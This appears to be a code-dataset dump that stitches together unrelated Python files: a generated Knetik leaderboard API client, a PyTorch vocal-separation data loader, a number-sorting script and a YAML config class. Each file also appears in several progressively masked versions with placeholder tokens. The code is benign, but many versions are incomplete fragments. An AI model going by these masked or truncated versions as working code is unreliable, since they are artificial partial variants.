_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
normal
|
{
"blob_id": "05aec07b94f3363e07d8740b102262d817e08e71",
"index": 1253,
"step-1": "# coding: utf-8\n\n\"\"\"\n Knetik Platform API Documentation latest \n\n This is the spec for the Knetik API. Use this in conjunction with the documentation found at https://knetikcloud.com.\n\n OpenAPI spec version: latest \n Contact: support@knetik.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport sys\nimport os\nimport re\n\n# python 2 and python 3 compatibility library\nfrom six import iteritems\n\nfrom ..api_client import ApiClient\n\n\nclass GamificationLeaderboardsApi(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n Ref: https://github.com/swagger-api/swagger-codegen\n \"\"\"\n\n def __init__(self, api_client=None):\n if api_client is None:\n api_client = ApiClient()\n self.api_client = api_client\n\n def get_leaderboard(self, context_type, context_id, **kwargs):\n \"\"\"\n Retrieves leaderboard details and paginated entries\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard(context_type, context_id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param int size: The number of objects returned per page\n :param int page: The number of the page returned, starting with 1\n :param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]\n :return: LeaderboardResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async'):\n return self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)\n else:\n (data) = self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)\n return data\n\n def get_leaderboard_with_http_info(self, context_type, context_id, **kwargs):\n \"\"\"\n Retrieves leaderboard details and paginated entries\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_with_http_info(context_type, context_id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param int size: The number of objects returned per page\n :param int page: The number of the page returned, starting with 1\n :param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]\n :return: LeaderboardResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['context_type', 'context_id', 'size', 'page', 'order']\n all_params.append('async')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_leaderboard\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'context_type' is set\n if ('context_type' not in params) or (params['context_type'] is None):\n raise ValueError(\"Missing the required parameter `context_type` when calling `get_leaderboard`\")\n # verify the required parameter 'context_id' is set\n if ('context_id' not in params) or (params['context_id'] is None):\n raise ValueError(\"Missing the required parameter `context_id` when calling `get_leaderboard`\")\n\n\n collection_formats = {}\n\n path_params = {}\n if 'context_type' in params:\n path_params['context_type'] = params['context_type']\n if 'context_id' in params:\n path_params['context_id'] = params['context_id']\n\n query_params = []\n if 'size' in params:\n query_params.append(('size', params['size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n if 'order' in params:\n query_params.append(('order', params['order']))\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # Authentication setting\n auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']\n\n return self.api_client.call_api('/leaderboards/{context_type}/{context_id}', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LeaderboardResource',\n auth_settings=auth_settings,\n async=params.get('async'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_leaderboard_rank(self, context_type, context_id, id, **kwargs):\n \"\"\"\n Retrieves a specific user entry with rank\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_rank(context_type, context_id, id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param str id: The id of a user (required)\n :return: LeaderboardEntryResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async'):\n return self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)\n else:\n (data) = self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)\n return data\n\n def get_leaderboard_rank_with_http_info(self, context_type, context_id, id, **kwargs):\n \"\"\"\n Retrieves a specific user entry with rank\n The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_rank_with_http_info(context_type, context_id, id, async=True)\n >>> result = thread.get()\n\n :param async bool\n :param str context_type: The context type for the leaderboard (required)\n :param str context_id: The context id for the leaderboard (required)\n :param str id: The id of a user (required)\n :return: LeaderboardEntryResource\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['context_type', 'context_id', 'id']\n all_params.append('async')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_leaderboard_rank\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'context_type' is set\n if ('context_type' not in params) or (params['context_type'] is None):\n raise ValueError(\"Missing the required parameter `context_type` when calling `get_leaderboard_rank`\")\n # verify the required parameter 'context_id' is set\n if ('context_id' not in params) or (params['context_id'] is None):\n raise ValueError(\"Missing the required parameter `context_id` when calling `get_leaderboard_rank`\")\n # verify the required parameter 'id' is set\n if ('id' not in params) or (params['id'] is None):\n raise ValueError(\"Missing the required parameter `id` when calling `get_leaderboard_rank`\")\n\n\n collection_formats = {}\n\n path_params = {}\n if 'context_type' in params:\n path_params['context_type'] = params['context_type']\n if 'context_id' in params:\n path_params['context_id'] = params['context_id']\n if 'id' in params:\n path_params['id'] = params['id']\n\n query_params = []\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # Authentication setting\n auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']\n\n return self.api_client.call_api('/leaderboards/{context_type}/{context_id}/users/{id}/rank', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LeaderboardEntryResource',\n auth_settings=auth_settings,\n async=params.get('async'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_leaderboard_strategies(self, **kwargs):\n \"\"\"\n Get a list of available leaderboard strategy names\n <b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_strategies(async=True)\n >>> result = thread.get()\n\n :param async bool\n :return: list[str]\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async'):\n return self.get_leaderboard_strategies_with_http_info(**kwargs)\n else:\n (data) = self.get_leaderboard_strategies_with_http_info(**kwargs)\n return data\n\n def get_leaderboard_strategies_with_http_info(self, **kwargs):\n \"\"\"\n Get a list of available leaderboard strategy names\n <b>Permissions Needed:</b> ANY\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async=True\n >>> thread = api.get_leaderboard_strategies_with_http_info(async=True)\n >>> result = thread.get()\n\n :param async bool\n :return: list[str]\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = []\n all_params.append('async')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_leaderboard_strategies\" % key\n )\n params[key] = val\n del params['kwargs']\n\n collection_formats = {}\n\n path_params = {}\n\n query_params = []\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # Authentication setting\n auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']\n\n return self.api_client.call_api('/leaderboards/strategies', 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='list[str]',\n auth_settings=auth_settings,\n async=params.get('async'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class TorchData(Dataset):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}
return sample
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=
shuffle, **kwargs)
return loader
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}
return sample
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=
shuffle, **kwargs)
return loader
train_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,
True, PARAS.kwargs)
validation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.
BATCH_SIZE, False, PARAS.kwargs)
test_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE,
False, PARAS.kwargs)
if __name__ == '__main__':
for index, data_item in enumerate(test_loader):
print(data_item['vocal'].shape)
print(data_item['bg'].shape)
print(data_item['mix'].shape)
print(data_item['target'].shape)
break
<|reserved_special_token_1|>
import torch
import numpy as np
import h5py
from torch.utils.data import Dataset, DataLoader
from config import PARAS
<|reserved_special_token_0|>
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}
return sample
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=
shuffle, **kwargs)
return loader
train_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,
True, PARAS.kwargs)
validation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.
BATCH_SIZE, False, PARAS.kwargs)
test_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE,
False, PARAS.kwargs)
if __name__ == '__main__':
for index, data_item in enumerate(test_loader):
print(data_item['vocal'].shape)
print(data_item['bg'].shape)
print(data_item['mix'].shape)
print(data_item['target'].shape)
break
<|reserved_special_token_1|>
import torch
import numpy as np
import h5py
from torch.utils.data import Dataset, DataLoader
from config import PARAS
"""
Be careful:
We use log mel-spectrogram for training,
while the mask generated is for power mel-spectrogram
"""
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {
'vocal': vocal, # this is used for test
'bg': bg, # this is used for test
'mix': mix,
'target': target,
}
return sample
# define the data loaders
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset),
batch_size=batch_size,
shuffle=shuffle,
**kwargs)
return loader
train_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE, True, PARAS.kwargs)
validation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)
test_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)
if __name__ == '__main__':
for index, data_item in enumerate(test_loader):
print(data_item['vocal'].shape)
print(data_item['bg'].shape)
print(data_item['mix'].shape)
print(data_item['target'].shape)
break
|
flexible
|
{
"blob_id": "1133d3cf900e31278dc491565c99969a116e6c83",
"index": 1998,
"step-1": "<mask token>\n\n\nclass TorchData(Dataset):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}\n return sample\n\n\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=\n shuffle, **kwargs)\n return loader\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}\n return sample\n\n\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=\n shuffle, **kwargs)\n return loader\n\n\ntrain_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,\n True, PARAS.kwargs)\nvalidation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.\n BATCH_SIZE, False, PARAS.kwargs)\ntest_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, \n False, PARAS.kwargs)\nif __name__ == '__main__':\n for index, data_item in enumerate(test_loader):\n print(data_item['vocal'].shape)\n print(data_item['bg'].shape)\n print(data_item['mix'].shape)\n print(data_item['target'].shape)\n break\n",
"step-4": "import torch\nimport numpy as np\nimport h5py\nfrom torch.utils.data import Dataset, DataLoader\nfrom config import PARAS\n<mask token>\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}\n return sample\n\n\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=\n shuffle, **kwargs)\n return loader\n\n\ntrain_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,\n True, PARAS.kwargs)\nvalidation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.\n BATCH_SIZE, False, PARAS.kwargs)\ntest_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, \n False, PARAS.kwargs)\nif __name__ == '__main__':\n for index, data_item in enumerate(test_loader):\n print(data_item['vocal'].shape)\n print(data_item['bg'].shape)\n print(data_item['mix'].shape)\n print(data_item['target'].shape)\n break\n",
"step-5": "import torch\nimport numpy as np\nimport h5py\nfrom torch.utils.data import Dataset, DataLoader\nfrom config import PARAS\n\n\"\"\"\nBe careful:\nWe use log mel-spectrogram for training,\nwhile the mask generated is for power mel-spectrogram\n\"\"\"\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n\n sample = {\n 'vocal': vocal, # this is used for test\n 'bg': bg, # this is used for test\n 'mix': mix,\n 'target': target,\n }\n\n return sample\n\n\n# define the data loaders\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset),\n batch_size=batch_size,\n shuffle=shuffle,\n **kwargs)\n return loader\n\n\ntrain_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE, True, PARAS.kwargs)\nvalidation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)\ntest_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)\n\n\nif __name__ == '__main__':\n\n for index, data_item in enumerate(test_loader):\n print(data_item['vocal'].shape)\n print(data_item['bg'].shape)\n print(data_item['mix'].shape)\n print(data_item['target'].shape)\n break\n",
"step-ids": [
1,
6,
8,
9,
10
]
}
|
[
1,
6,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
num_seq = input('Введите последовательность чисел через пробел: ').split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def is_numb_val(val):
try:
x = float(val)
except ValueError:
return False
else:
return True
def main():
num_seq = input('Введите последовательность чисел через пробел: ').split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def is_numb_val(val):
try:
x = float(val)
except ValueError:
return False
else:
return True
def main():
num_seq = input('Введите последовательность чисел через пробел: ').split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# Напишите программу, которая вводит с клавиатуры последовательность чисел и выводит её
# отсортированной в порядке возрастания.
def is_numb_val(val):
try:
x = float(val)
except ValueError:
return False
else:
return True
def main():
num_seq = input("Введите последовательность чисел через пробел: ").split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "4c8a873c816678532b029af409be13258757eae1",
"index": 7577,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n num_seq = input('Введите последовательность чисел через пробел: ').split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\n<mask token>\n",
"step-3": "def is_numb_val(val):\n try:\n x = float(val)\n except ValueError:\n return False\n else:\n return True\n\n\ndef main():\n num_seq = input('Введите последовательность чисел через пробел: ').split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\n<mask token>\n",
"step-4": "def is_numb_val(val):\n try:\n x = float(val)\n except ValueError:\n return False\n else:\n return True\n\n\ndef main():\n num_seq = input('Введите последовательность чисел через пробел: ').split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Напишите программу, которая вводит с клавиатуры последовательность чисел и выводит её\n# отсортированной в порядке возрастания.\n\n\ndef is_numb_val(val):\n try:\n x = float(val)\n except ValueError:\n return False\n else:\n return True\n\ndef main():\n num_seq = input(\"Введите последовательность чисел через пробел: \").split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Config(OrderedDict):
<|reserved_special_token_0|>
def __init__(self):
ec = Console(stderr=True, style='bold red')
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Config(OrderedDict):
<|reserved_special_token_0|>
def __init__(self):
ec = Console(stderr=True, style='bold red')
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), 'w') as handle:
bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':
{'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':
'sha256_hash', 'imphash': 'imphash', 'signature':
'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))
if bytes <= 0:
raise IOError(f'Writing to config file failed.')
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Config(OrderedDict):
instance = None
def __init__(self):
ec = Console(stderr=True, style='bold red')
